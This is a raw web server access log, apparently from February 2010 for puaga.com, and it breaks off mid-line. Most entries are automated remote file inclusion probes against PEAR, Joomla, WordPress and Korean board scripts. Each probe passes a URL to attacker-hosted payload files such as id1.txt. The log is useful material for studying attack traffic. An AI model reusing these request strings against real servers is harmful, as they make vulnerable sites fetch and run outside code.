125.141.91.138 - - [14/Feb/2010:09:37:16 -0800] "GET /PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:16 -0800] "GET /logs//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:16 -0800] "GET /logs/access_100203.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:37:25 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:35 -0800] "GET /PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:35 -0800] "GET /logs/access_100203.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:36 -0800] "GET /logs//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:44 -0800] "GET /logs/access_100122.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:37:51 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:37:54 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:37:56 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:37:56 -0800] "GET /logs/access_100122.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [14/Feb/2010:09:38:22 -0800] "GET /logs/access_100111.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:38:24 -0800] "GET /logs/access_100122.log%20%20//PEAR_DIR/PEAR.php?include_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:38:42 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:38:45 -0800] "GET /logs/access_100126.log/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:38:45 -0800] "GET /errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:09:38:45 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:38:50 -0800] "GET /logs/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:38:56 -0800] "GET /logs/access_100124.log/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.67.139 - - [14/Feb/2010:09:39:43 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://cosmeticawards.com/submit/upload/id/nid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
79.174.72.128 - - [14/Feb/2010:09:39:49 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://cosmeticawards.com/submit/upload/id/nid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
192.58.52.252 - - [14/Feb/2010:09:40:08 -0800] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://www.nofaultattorneys.com/images/.bash/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.58.52.252 - - [14/Feb/2010:09:40:08 -0800] "GET /logs///skin/ggambo7002_board/comment_modify.php?dir=http://www.nofaultattorneys.com/images/.bash/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.58.52.252 - - [14/Feb/2010:09:40:08 -0800] "GET /logs/access_100109.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.nofaultattorneys.com/images/.bash/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:18 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:18 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:18 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:40:32 -0800] "GET /logs/access_100112.log%20%20/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:40:32 -0800] "GET /logs/access_100124.log%20%20/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:40:32 -0800] "GET /main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:40:32 -0800] "GET /logs/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:40:33 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.puaga.com"
190.54.58.219 - - [14/Feb/2010:09:40:33 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/test.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:43 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:43 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:43 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:46 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:46 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:40:46 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
192.58.52.252 - - [14/Feb/2010:09:40:50 -0800] "GET /logs/access_100130.log%20%20///skin/ggambo7002_board/comment_modify.php?dir=http://www.nofaultattorneys.com/images/.bash/zfxid.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:40:58 -0800] "GET /logs/access_100111.log%20%20//login.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:40:58 -0800] "GET /login.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:40:58 -0800] "GET /logs//login.php?dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:41:08 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:41:08 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:41:08 -0800] "GET /logs/access_100103.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:18 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:09:41:25 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:26 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:27 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:27 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:27 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:27 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:27 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:32 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:41:44 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:41:53 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:10 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:42:15 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:42:15 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:42:15 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:18 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:09:42:24 -0800] "GET /logs/access_100103.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:48 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:48 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:48 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:52 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:42:52 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:42:59 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:43:32 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:43:40 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:04 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:04 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:04 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:16 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:24 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:24 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:24 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.186 - - [14/Feb/2010:09:44:27 -0800] "GET /ideal/forum/viewtopic.php?p=11579 HTTP/1.1" 404 5258 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "puaga.com"
218.38.136.125 - - [14/Feb/2010:09:44:43 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:45:00 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:45:02 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:09:45:12 -0800] "GET /logs/access_100109.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:45:39 -0800] "GET /logs/access_100124.log/errors.php?error=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [14/Feb/2010:09:46:36 -0800] "GET /appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [14/Feb/2010:09:46:36 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [14/Feb/2010:09:46:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:09:46:41 -0800] "GET /logs/access_100208.log//write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:09:46:44 -0800] "GET /logs/access_100103.log//write_ok.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:36 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:36 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:36 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:41 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:41 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:47:41 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [14/Feb/2010:09:48:19 -0800] "GET /logs/access_100124.log/errors.php?error=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:48:19 -0800] "GET /logs/access_100104.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:48:19 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:48:19 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [14/Feb/2010:09:48:42 -0800] "GET /logs/access_100124.log//appserv/main.php?appserv_root=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:49:36 -0800] "GET /logs//yabbse/poc.php?poc_root_path=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:49:36 -0800] "GET /yabbse/poc.php?poc_root_path=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:09:49:36 -0800] "GET /logs/access_100117.log%20%20//yabbse/poc.php?poc_root_path=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:49:50 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:49:50 -0800] "GET /logs/access_100105.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:49:50 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:50:17 -0800] "GET /logs/access_100104.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [14/Feb/2010:09:50:52 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [14/Feb/2010:09:50:52 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [14/Feb/2010:09:50:52 -0800] "GET /logs/access_100103.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:51:08 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:51:13 -0800] "GET /logs/access_100115.log%20%20/ad